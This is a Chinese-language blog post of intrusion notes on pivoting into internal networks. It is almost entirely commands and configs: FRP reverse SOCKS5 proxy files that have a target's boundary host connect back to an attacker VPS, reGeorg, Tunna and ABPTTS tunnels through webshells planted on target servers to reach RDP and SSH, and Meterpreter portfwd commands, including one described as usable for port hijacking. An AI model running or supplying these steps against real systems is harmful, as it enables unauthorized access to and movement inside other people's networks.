FRP or reGeorg OR tunna

2021年12月20日

利用Frp反向socks代理流量

攻击机:      12.12.12.12       frps.exe ‐c frps.ini       开启监听
目标边界:     27.18.19.98       ./frpc ‐c frpc.ini        反向连接

先配置frps.ini文件

# frps.ini
[common]
bind_addr = 0.0.0.0
bind_port = 7000
token = www.nat.ee

开始监听

frps.exe ‐c frps.ini

目标边界反向连接

先配置frpc.ini文件

# frpc.ini
[common]
server_addr = 12.12.12.12         # 自己公网VPS的IP
server_port = 7000                  # 自己公网VPS监听的端口
token = www.nat.ee                  # 必须得有,否则会authorization failed
[http_proxy]
type = tcp
#local_ip = 127.0.0.1
#local_port = 22
remote_port = 8010                  # 公网VPS的proxifier设置的端口
plugin = socks5                     # 使用插件socks代理
plugin_user = abc                   # proxifier连接的账号密码
plugin_passwd = abc

执行反向连接命令:

./frpc ‐c frpc.ini

Proxifier 设置 12.12.12.12 8010

并输入账号密码 abc abc

reGeorg

https://github.com/sensepost/reGeorg

https://github.com/phith0n/reGeorg/blob/master/reGeorgSocksProxy.py

python reGeorgSocksProxy.py -l 127.0.0.1 -p 3344 -u http://12.12.12.12/tunnel.nosocket.php

tunna

https://github.com/SECFORCE/Tunna

https://www.vuln.cn/6529

连接3389

python proxy.py -u http://172.0.0.1/conn.aspx  -l 1234 -r 3389 –v

通过该方法访问内网的其他服务器,命令如下:

python proxy.py -u http://172.0.0.1/conn.php -l 1234 -a 172.0.0.2 -r 3389
172.0.0.1是webshell所在服务器,172.0.0.2是内网访问的服务器,3389为远程终端端口,有些服务器修改器默认端口为其它端口。本地直接登录远程终端地址127.0.0.1:1234即可。参数含义如下:
-l 表示本地监听的端口
-r 远程要转发的端口
-v 详细模式

2.连接SSH

对于SSH服务需要添加-s参数,才能保证连接的时候不会中断,执行命令:

python proxy.py -u http://218.4.45.152:8877/job/conn.aspx -l 1234 -r 22 -v –s

在本地使用ssh连接1234端口即可:

ssh localhost -p 1234

https://xz.aliyun.com/t/7701

Abptts

靶机       15.76.11.192          放置webshell
攻击机     201.141.112.91         python abpttsclient.py ‐c webshell/config.txt

0x0­1 安装

git clone  https://github.com/nccgroup/ABPTTS.git
apt install python‐setuptools
apt install python‐pip
pip install ‐‐upgrade pip
python ‐m pip install pycrypto
python ‐m pip install pycryptodome
python ‐m pip install httplib2
cd ABPTTS
python abpttsfactory.py ‐o webshell

0x02 攻击机连接

命令格式:

# 将目标边界的3389转发到本地的33389端口上
python abpttsclient.py ‐c webshell/config.txt ‐u "http://15.76.11.192/abptts.jsp" -f 127.0.0.1:33389/127.0.0.1:3389

链接本地的33389端口

portfwd

  -L <opt>  转发: 本地监听地址  反向: 本地主机连接到某个地址
    -R        表示正向反向端口
    -h        帮助信息
    -i <opt>  端口转发条目的索引与交互(请参阅“列表”命令)
    -l <opt>  转发:本地端口收听  反向:本地端口连接
    -p <opt>  转发:远程端口连接  反向:远程端口监听
    -r <opt>  转发:连接到远程主机

将内网某台主机的3389转发到本地

portfwd add -L 0.0.0.0 -l 1144 -p 3389 -r 10.159.63.178

将内网某台主机端口流量转发到某台外网主机 (可做端口劫持)

portfwd add -R -l 8080 -p 1478 -L 10.159.191.2
portfwd list         列出所有转发条目
portfwd delete -i 1    删除条目为1的端口转发
portfwd flush       清空所有转发


分类:技术文章 | 标签: 渗透渗透神器内网proxy | 查看:593
内网抓取密码Windows域信息收集提权命令

发表评论: